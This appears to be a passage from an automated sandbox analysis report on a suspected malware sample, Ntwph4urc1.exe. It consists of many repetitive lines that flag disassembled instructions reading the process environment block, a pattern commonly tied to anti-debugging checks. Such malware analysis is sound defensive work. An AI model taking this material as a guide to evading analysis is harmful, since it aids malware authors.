      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695B440 mov eax, dword ptr fs:[00000030h]9_2_3695B440
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695B440 mov eax, dword ptr fs:[00000030h]9_2_3695B440
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695B440 mov eax, dword ptr fs:[00000030h]9_2_3695B440
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A2547F mov eax, dword ptr fs:[00000030h]9_2_36A2547F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0F453 mov eax, dword ptr fs:[00000030h]9_2_36A0F453
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36951460 mov eax, dword ptr fs:[00000030h]9_2_36951460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36951460 mov eax, dword ptr fs:[00000030h]9_2_36951460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36951460 mov eax, dword ptr fs:[00000030h]9_2_36951460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36951460 mov eax, dword ptr fs:[00000030h]9_2_36951460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36951460 mov eax, dword ptr fs:[00000030h]9_2_36951460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3696F460 mov eax, dword ptr fs:[00000030h]9_2_3696F460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3696F460 mov eax, dword ptr fs:[00000030h]9_2_3696F460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3696F460 mov eax, dword ptr fs:[00000030h]9_2_3696F460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3696F460 mov eax, dword ptr fs:[00000030h]9_2_3696F460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3696F460 mov eax, dword ptr fs:[00000030h]9_2_3696F460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3696F460 mov eax, dword ptr fs:[00000030h]9_2_3696F460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369DB594 mov eax, dword ptr fs:[00000030h]9_2_369DB594
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369DB594 mov eax, dword ptr fs:[00000030h]9_2_369DB594
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694758F mov eax, dword ptr fs:[00000030h]9_2_3694758F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694758F mov eax, dword ptr fs:[00000030h]9_2_3694758F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694758F mov eax, dword ptr fs:[00000030h]9_2_3694758F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0F5BE mov eax, dword ptr fs:[00000030h]9_2_36A0F5BE
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369E35BA mov eax, dword ptr fs:[00000030h]9_2_369E35BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369E35BA mov eax, dword ptr fs:[00000030h]9_2_369E35BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369E35BA mov eax, dword ptr fs:[00000030h]9_2_369E35BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369E35BA mov eax, dword ptr fs:[00000030h]9_2_369E35BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697F5B0 mov eax, dword ptr fs:[00000030h]9_2_3697F5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697F5B0 mov eax, dword ptr fs:[00000030h]9_2_3697F5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697F5B0 mov eax, dword ptr fs:[00000030h]9_2_3697F5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697F5B0 mov eax, dword ptr fs:[00000030h]9_2_3697F5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697F5B0 mov eax, dword ptr fs:[00000030h]9_2_3697F5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697F5B0 mov eax, dword ptr fs:[00000030h]9_2_3697F5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697F5B0 mov eax, dword ptr fs:[00000030h]9_2_3697F5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697F5B0 mov eax, dword ptr fs:[00000030h]9_2_3697F5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697F5B0 mov eax, dword ptr fs:[00000030h]9_2_3697F5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369ED5B0 mov eax, dword ptr fs:[00000030h]9_2_369ED5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369ED5B0 mov eax, dword ptr fs:[00000030h]9_2_369ED5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369715A9 mov eax, dword ptr fs:[00000030h]9_2_369715A9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369715A9 mov eax, dword ptr fs:[00000030h]9_2_369715A9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369715A9 mov eax, dword ptr fs:[00000030h]9_2_369715A9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369715A9 mov eax, dword ptr fs:[00000030h]9_2_369715A9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369715A9 mov eax, dword ptr fs:[00000030h]9_2_369715A9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369CD5D0 mov eax, dword ptr fs:[00000030h]9_2_369CD5D0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369CD5D0 mov ecx, dword ptr fs:[00000030h]9_2_369CD5D0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369795DA mov eax, dword ptr fs:[00000030h]9_2_369795DA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369855C0 mov eax, dword ptr fs:[00000030h]9_2_369855C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369715F4 mov eax, dword ptr fs:[00000030h]9_2_369715F4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369715F4 mov eax, dword ptr fs:[00000030h]9_2_369715F4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369715F4 mov eax, dword ptr fs:[00000030h]9_2_369715F4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369715F4 mov eax, dword ptr fs:[00000030h]9_2_369715F4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369715F4 mov eax, dword ptr fs:[00000030h]9_2_369715F4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369715F4 mov eax, dword ptr fs:[00000030h]9_2_369715F4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A255C9 mov eax, dword ptr fs:[00000030h]9_2_36A255C9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A235D7 mov eax, dword ptr fs:[00000030h]9_2_36A235D7
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A235D7 mov eax, dword ptr fs:[00000030h]9_2_36A235D7
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A235D7 mov eax, dword ptr fs:[00000030h]9_2_36A235D7
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0B52F mov eax, dword ptr fs:[00000030h]9_2_36A0B52F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A25537 mov eax, dword ptr fs:[00000030h]9_2_36A25537
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36987505 mov eax, dword ptr fs:[00000030h]9_2_36987505
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36987505 mov ecx, dword ptr fs:[00000030h]9_2_36987505
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695D534 mov eax, dword ptr fs:[00000030h]9_2_3695D534
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695D534 mov eax, dword ptr fs:[00000030h]9_2_3695D534
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695D534 mov eax, dword ptr fs:[00000030h]9_2_3695D534
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695D534 mov eax, dword ptr fs:[00000030h]9_2_3695D534
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695D534 mov eax, dword ptr fs:[00000030h]9_2_3695D534
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695D534 mov eax, dword ptr fs:[00000030h]9_2_3695D534
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3698D530 mov eax, dword ptr fs:[00000030h]9_2_3698D530
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3698D530 mov eax, dword ptr fs:[00000030h]9_2_3698D530
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369FF525 mov eax, dword ptr fs:[00000030h]9_2_369FF525
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369FF525 mov eax, dword ptr fs:[00000030h]9_2_369FF525
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369FF525 mov eax, dword ptr fs:[00000030h]9_2_369FF525
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369FF525 mov eax, dword ptr fs:[00000030h]9_2_369FF525
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369FF525 mov eax, dword ptr fs:[00000030h]9_2_369FF525
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369FF525 mov eax, dword ptr fs:[00000030h]9_2_369FF525
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369FF525 mov eax, dword ptr fs:[00000030h]9_2_369FF525
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369FB550 mov eax, dword ptr fs:[00000030h]9_2_369FB550
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369FB550 mov eax, dword ptr fs:[00000030h]9_2_369FB550
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369FB550 mov eax, dword ptr fs:[00000030h]9_2_369FB550
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3698B570 mov eax, dword ptr fs:[00000030h]9_2_3698B570
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3698B570 mov eax, dword ptr fs:[00000030h]9_2_3698B570
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694B562 mov eax, dword ptr fs:[00000030h]9_2_3694B562
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3698329E mov eax, dword ptr fs:[00000030h]9_2_3698329E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3698329E mov eax, dword ptr fs:[00000030h]9_2_3698329E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A192A6 mov eax, dword ptr fs:[00000030h]9_2_36A192A6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A192A6 mov eax, dword ptr fs:[00000030h]9_2_36A192A6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A192A6 mov eax, dword ptr fs:[00000030h]9_2_36A192A6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A192A6 mov eax, dword ptr fs:[00000030h]9_2_36A192A6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A25283 mov eax, dword ptr fs:[00000030h]9_2_36A25283
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369D92BC mov eax, dword ptr fs:[00000030h]9_2_369D92BC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369D92BC mov eax, dword ptr fs:[00000030h]9_2_369D92BC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369D92BC mov ecx, dword ptr fs:[00000030h]9_2_369D92BC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369D92BC mov ecx, dword ptr fs:[00000030h]9_2_369D92BC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369652A0 mov eax, dword ptr fs:[00000030h]9_2_369652A0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369652A0 mov eax, dword ptr fs:[00000030h]9_2_369652A0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369652A0 mov eax, dword ptr fs:[00000030h]9_2_369652A0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369652A0 mov eax, dword ptr fs:[00000030h]9_2_369652A0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369E72A0 mov eax, dword ptr fs:[00000030h]9_2_369E72A0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369E72A0 mov eax, dword ptr fs:[00000030h]9_2_369E72A0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A252E2 mov eax, dword ptr fs:[00000030h]9_2_36A252E2
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697F2D0 mov eax, dword ptr fs:[00000030h]9_2_3697F2D0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697F2D0 mov eax, dword ptr fs:[00000030h]9_2_3697F2D0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694B2D3 mov eax, dword ptr fs:[00000030h]9_2_3694B2D3
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694B2D3 mov eax, dword ptr fs:[00000030h]9_2_3694B2D3
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694B2D3 mov eax, dword ptr fs:[00000030h]9_2_3694B2D3
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A012ED mov eax, dword ptr fs:[00000030h]9_2_36A012ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A012ED mov eax, dword ptr fs:[00000030h]9_2_36A012ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A012ED mov eax, dword ptr fs:[00000030h]9_2_36A012ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A012ED mov eax, dword ptr fs:[00000030h]9_2_36A012ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A012ED mov eax, dword ptr fs:[00000030h]9_2_36A012ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A012ED mov eax, dword ptr fs:[00000030h]9_2_36A012ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A012ED mov eax, dword ptr fs:[00000030h]9_2_36A012ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A012ED mov eax, dword ptr fs:[00000030h]9_2_36A012ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A012ED mov eax, dword ptr fs:[00000030h]9_2_36A012ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A012ED mov eax, dword ptr fs:[00000030h]9_2_36A012ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A012ED mov eax, dword ptr fs:[00000030h]9_2_36A012ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A012ED mov eax, dword ptr fs:[00000030h]9_2_36A012ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A012ED mov eax, dword ptr fs:[00000030h]9_2_36A012ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A012ED mov eax, dword ptr fs:[00000030h]9_2_36A012ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369592C5 mov eax, dword ptr fs:[00000030h]9_2_369592C5
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369592C5 mov eax, dword ptr fs:[00000030h]9_2_369592C5
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697B2C0 mov eax, dword ptr fs:[00000030h]9_2_3697B2C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697B2C0 mov eax, dword ptr fs:[00000030h]9_2_3697B2C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697B2C0 mov eax, dword ptr fs:[00000030h]9_2_3697B2C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697B2C0 mov eax, dword ptr fs:[00000030h]9_2_3697B2C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697B2C0 mov eax, dword ptr fs:[00000030h]9_2_3697B2C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697B2C0 mov eax, dword ptr fs:[00000030h]9_2_3697B2C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697B2C0 mov eax, dword ptr fs:[00000030h]9_2_3697B2C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0F2F8 mov eax, dword ptr fs:[00000030h]9_2_36A0F2F8
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369492FF mov eax, dword ptr fs:[00000030h]9_2_369492FF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369FB2F0 mov eax, dword ptr fs:[00000030h]9_2_369FB2F0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369FB2F0 mov eax, dword ptr fs:[00000030h]9_2_369FB2F0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A25227 mov eax, dword ptr fs:[00000030h]9_2_36A25227
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36987208 mov eax, dword ptr fs:[00000030h]9_2_36987208
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36987208 mov eax, dword ptr fs:[00000030h]9_2_36987208
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1D26B mov eax, dword ptr fs:[00000030h]9_2_36A1D26B
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1D26B mov eax, dword ptr fs:[00000030h]9_2_36A1D26B
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369DD250 mov ecx, dword ptr fs:[00000030h]9_2_369DD250
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36949240 mov eax, dword ptr fs:[00000030h]9_2_36949240
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36949240 mov eax, dword ptr fs:[00000030h]9_2_36949240
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3698724D mov eax, dword ptr fs:[00000030h]9_2_3698724D
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36979274 mov eax, dword ptr fs:[00000030h]9_2_36979274
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36991270 mov eax, dword ptr fs:[00000030h]9_2_36991270
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36991270 mov eax, dword ptr fs:[00000030h]9_2_36991270
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0B256 mov eax, dword ptr fs:[00000030h]9_2_36A0B256
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0B256 mov eax, dword ptr fs:[00000030h]9_2_36A0B256
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369A739A mov eax, dword ptr fs:[00000030h]9_2_369A739A
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369A739A mov eax, dword ptr fs:[00000030h]9_2_369A739A
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369F13B9 mov eax, dword ptr fs:[00000030h]9_2_369F13B9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369F13B9 mov eax, dword ptr fs:[00000030h]9_2_369F13B9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369F13B9 mov eax, dword ptr fs:[00000030h]9_2_369F13B9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369733A5 mov eax, dword ptr fs:[00000030h]9_2_369733A5
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369833A0 mov eax, dword ptr fs:[00000030h]9_2_369833A0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369833A0 mov eax, dword ptr fs:[00000030h]9_2_369833A0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A2539D mov eax, dword ptr fs:[00000030h]9_2_36A2539D
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0F3E6 mov eax, dword ptr fs:[00000030h]9_2_36A0F3E6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A253FC mov eax, dword ptr fs:[00000030h]9_2_36A253FC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0B3D0 mov ecx, dword ptr fs:[00000030h]9_2_36A0B3D0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1132D mov eax, dword ptr fs:[00000030h]9_2_36A1132D
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1132D mov eax, dword ptr fs:[00000030h]9_2_36A1132D
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369D930B mov eax, dword ptr fs:[00000030h]9_2_369D930B
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369D930B mov eax, dword ptr fs:[00000030h]9_2_369D930B
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369D930B mov eax, dword ptr fs:[00000030h]9_2_369D930B
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36947330 mov eax, dword ptr fs:[00000030h]9_2_36947330
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697F32A mov eax, dword ptr fs:[00000030h]9_2_3697F32A
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36949353 mov eax, dword ptr fs:[00000030h]9_2_36949353
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36949353 mov eax, dword ptr fs:[00000030h]9_2_36949353
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0F367 mov eax, dword ptr fs:[00000030h]9_2_36A0F367
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694D34C mov eax, dword ptr fs:[00000030h]9_2_3694D34C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694D34C mov eax, dword ptr fs:[00000030h]9_2_3694D34C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A25341 mov eax, dword ptr fs:[00000030h]9_2_36A25341
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36957370 mov eax, dword ptr fs:[00000030h]9_2_36957370
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36957370 mov eax, dword ptr fs:[00000030h]9_2_36957370
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36957370 mov eax, dword ptr fs:[00000030h]9_2_36957370
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369F3370 mov eax, dword ptr fs:[00000030h]9_2_369F3370
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36955096 mov eax, dword ptr fs:[00000030h]9_2_36955096
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3698909C mov eax, dword ptr fs:[00000030h]9_2_3698909C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697D090 mov eax, dword ptr fs:[00000030h]9_2_3697D090
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697D090 mov eax, dword ptr fs:[00000030h]9_2_3697D090
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694D08D mov eax, dword ptr fs:[00000030h]9_2_3694D08D
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369DD080 mov eax, dword ptr fs:[00000030h]9_2_369DD080
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369DD080 mov eax, dword ptr fs:[00000030h]9_2_369DD080
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369790DB mov eax, dword ptr fs:[00000030h]9_2_369790DB
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov eax, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov ecx, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov ecx, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov eax, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov ecx, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov ecx, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov eax, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov eax, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov eax, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov eax, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov eax, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov eax, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov eax, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov eax, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov eax, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov eax, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov eax, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369670C0 mov eax, dword ptr fs:[00000030h]9_2_369670C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369CD0C0 mov eax, dword ptr fs:[00000030h]9_2_369CD0C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369CD0C0 mov eax, dword ptr fs:[00000030h]9_2_369CD0C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369750E4 mov eax, dword ptr fs:[00000030h]9_2_369750E4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369750E4 mov ecx, dword ptr fs:[00000030h]9_2_369750E4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A250D9 mov eax, dword ptr fs:[00000030h]9_2_36A250D9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1903E mov eax, dword ptr fs:[00000030h]9_2_36A1903E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1903E mov eax, dword ptr fs:[00000030h]9_2_36A1903E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1903E mov eax, dword ptr fs:[00000030h]9_2_36A1903E
